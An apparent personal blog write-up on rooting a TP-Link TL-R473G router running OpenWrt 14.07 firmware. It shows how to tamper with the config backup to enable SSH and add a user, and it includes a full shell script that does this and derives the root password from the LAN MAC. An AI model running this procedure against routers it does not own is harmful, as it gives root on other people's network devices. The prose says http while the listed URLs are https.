TL-R473G Router Hack

I finally came back home to reset the router, which was accidentally bricked half a year ago. With more experience in Linux I finally gained root access to the device.

Purpose

The intention was to fully utilize the router so that I could use it as a bridge, allowing me to access both the China LAN and the home LAN from abroad, using a reverse proxy for NAT traversal. This, however, failed in a practical sense for various reasons.

Still, the successful root itself is a breakthrough.

Minimal root workflow

Back up the router config from the web interface; the generated file is named backup-TP-LINK-xxxx-xx-xx.bin

Rename to backup-TP-LINK-xxxx-xx-xx.bin.tar.gz

Use 7z to open the archive and edit tmp/userconfig/etc/config/dropbear, changing option ssh_port_switch from off to on

Restore using the modified backup.

Get the router's LAN MAC address (shown in the web console)

Derive the root password with

key=$(echo -n "$macAddr" | md5sum)
echo ${key:0:8}

where $macAddr is the MAC address in exactly the form the router stores it (the hash is taken over the literal string, so letter case and separator format both matter).

SSH into the router as root on port 33400, substituting the router's LAN IP address:

ssh root@<router-lan-ip> -p 33400

The Exploit

The official ROM has a web interface that allows backup and restore via a generated backup-TP-LINK-xxxx-xx-xx.bin file, which turns out to be a tar.gz archive of various config files, including /etc/passwd, /etc/shadow and /etc/config/dropbear.

By modifying the backup file and restoring it, we can therefore modify these system files.

To enable SSH login, modify /etc/config/dropbear.

Changing the root password hash in /etc/passwd (or /etc/shadow) has no effect, because /etc/init.d/dropbear regenerates the root password on startup from the LAN MAC address, using this function:

# Excerpt from the router's own /etc/init.d/dropbear: derives the root
# password as the first 8 hex characters of md5(LAN MAC address).
getNewPasswd()
{
        . /lib/functions.sh
        local macAddr=""
        # the MAC is stored under the tddp section of the uci config
        macAddr=$(uci_get tddp macaddr macaddr)
        #echo "macAddr is $macAddr" > /dev/console

        # md5sum prints "<32 hex chars>  -"; keep only the first 8 characters
        local key=$(echo -n "$macAddr" | md5sum)
        key=$(echo ${key:0:8})
        #echo "key is $key" > /dev/console

        echo ${key}
}

This file is not included in the backup, but it is mode 755 (world-readable), so any user who can SSH in can read it.

So the route is: first enable dropbear in the backup as in the minimal root workflow, then add a new user to /etc/passwd and /etc/shadow in the same backup, restore it, SSH in as that user, and read /etc/init.d/dropbear, which contains exactly the function above. From there the root password follows from the router's MAC address, as in the minimal root workflow. Note that the LAN MAC address is visible to every host on the LAN (and usually printed on the device label), so once SSH is enabled the root password is effectively public to anyone who can reach the SSH port.
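The whole procedure from the minimal root workflow and from this section, as an added example that is not code from the original post, from TP-Link or from OpenWrt: it builds a constructed stand-in for the backup archive (only the three files the exploit touches), flips ssh_port_switch to on, appends a login user to passwd and shadow inside the archive, repacks it, and derives the root password the same way the init script does. The paths tmp/userconfig/etc/passwd and tmp/userconfig/etc/shadow, the uid, the /bin/ash shell and the sample MAC are assumptions. The shadow hash is passed in; the usual way to make one is `openssl passwd -1 -salt <salt> <password>`, which yields the $1$ MD5-crypt form BusyBox accepts.

```shell
#!/bin/sh
# Added example, not code from the original post or from TP-Link/OpenWrt.
# Reproduces the backup-patching and password-derivation steps offline
# against a constructed stand-in for backup-TP-LINK-xxxx-xx-xx.bin.
set -eu

# The dropbear init script derives the root password as the first 8 hex
# characters of md5(macAddr). The MAC must be passed exactly as uci stores it
# (tddp.macaddr.macaddr): different case or separators give a different hash.
derive_root_password() {
    printf '%s' "$1" | md5sum | cut -c1-8
}

# Build a constructed backup holding only the three files the exploit touches.
# Real backups contain many more files; the paths below are assumed.
make_sample_backup() {
    work=$(mktemp -d)
    mkdir -p "$work/tmp/userconfig/etc/config"
    cat > "$work/tmp/userconfig/etc/config/dropbear" <<'EOF'
config dropbear
    option PasswordAuth 'on'
    option Port '22'
    option ssh_port_switch 'off'
EOF
    printf 'root:x:0:0:root:/root:/bin/ash\n' > "$work/tmp/userconfig/etc/passwd"
    printf 'root:*:0:0:99999:7:::\n' > "$work/tmp/userconfig/etc/shadow"
    tar -C "$work" -czf "$1" tmp
    rm -rf "$work"
}

# Extract a backup, enable the SSH port switch, add a login user, repack.
#   patch_backup <in.bin> <out.bin> <username> <uid> <md5crypt-hash>
patch_backup() {
    src=$1; dst=$2; user=$3; uid=$4; pwhash=$5
    work=$(mktemp -d)
    tar -C "$work" -xzf "$src"
    etc="$work/tmp/userconfig/etc"
    [ -f "$etc/config/dropbear" ] || { echo "no dropbear config in backup" >&2; rm -rf "$work"; return 1; }
    # Flip ssh_port_switch; handles both quoted ('off') and bare (off) values.
    sed -E "s/^([[:space:]]*option[[:space:]]+ssh_port_switch[[:space:]]+)'?off'?[[:space:]]*$/\1'on'/" \
        "$etc/config/dropbear" > "$etc/config/dropbear.new"
    mv "$etc/config/dropbear.new" "$etc/config/dropbear"
    # Refuse to clobber an existing account of the same name.
    if grep -q "^$user:" "$etc/passwd"; then
        echo "user $user already present" >&2; rm -rf "$work"; return 1
    fi
    # printf keeps the $ and / characters of the MD5-crypt hash intact.
    printf '%s:x:%s:%s:%s:/tmp:/bin/ash\n' "$user" "$uid" "$uid" "$user" >> "$etc/passwd"
    printf '%s:%s:0:0:99999:7:::\n' "$user" "$pwhash" >> "$etc/shadow"
    tar -C "$work" -czf "$dst" tmp
    rm -rf "$work"
}

# Read ssh_port_switch back out of a backup without extracting it to disk.
ssh_switch_value() {
    tar -xzOf "$1" tmp/userconfig/etc/config/dropbear \
        | awk '$1 == "option" && $2 == "ssh_port_switch" { print $3 }' | tr -d "'"
}

# True if the backup's passwd file contains the named user.
has_user() {
    tar -xzOf "$1" tmp/userconfig/etc/passwd | grep -q "^$2:"
}

# Against a real router the calls would be (not run here):
#   patch_backup backup-TP-LINK-xxxx-xx-xx.bin patched.bin tmpuser 1000 \
#       "$(openssl passwd -1 -salt ab12 secret)"
#   restore patched.bin from the web interface, then
#   ssh tmpuser@<router-lan-ip> -p 33400 and cat /etc/init.d/dropbear
#   derive_root_password "<MAC as stored in uci>"
```

The passwd entry uses /tmp as the home directory because the squashfs root is read-only on this firmware; the shell is /bin/ash, which is what BusyBox provides. Refusing to add a user that already exists avoids creating a duplicate root line, which the restore would silently accept.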

Misc

root@TP-LINK:/etc# cat /etc/*release
DISTRIB_ID="OpenWrt"
DISTRIB_RELEASE="Barrier Breaker"
DISTRIB_REVISION="r60685"
DISTRIB_CODENAME="barrier_breaker"
DISTRIB_TARGET="ar71xx/generic"
DISTRIB_DESCRIPTION="OpenWrt Barrier Breaker 14.07"
DISTRIB_TAINTS="no-all no-ipv6 busybox"

root@TP-LINK:/etc# opkg print-architecture
arch all 1
arch noarch 1
arch ar71xx 10

The CPU model is unclear because it is not documented by the OEM. A quick Google search shows a 775 MHz processor, which together with the MIPS architecture suggests a QCA9563 (QCA956x family); both are MIPS 74Kc cores.

Update opkg

Follow "opkg - Changing repository in openwrt" on Unix & Linux Stack Exchange, but replace https://downloads.openwrt.org with http://archive.openwrt.org: Barrier Breaker 14.07 is long out of support, its packages are only kept in the archive, and no security updates are published for it.

vim /etc/opkg.conf

add

src/gz base https://archive.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/base
src/gz luci https://archive.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/luci
src/gz management https://archive.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/management
src/gz oldpackages https://archive.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/oldpackages
src/gz packages https://archive.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/packages
src/gz routing https://archive.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/routing
src/gz telephony https://archive.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/telephony

Reference

tl-r473gp-ac (tl-r479gp-ac) root access, ss + ChinaDNS (shadowsocks + ChinaDNS)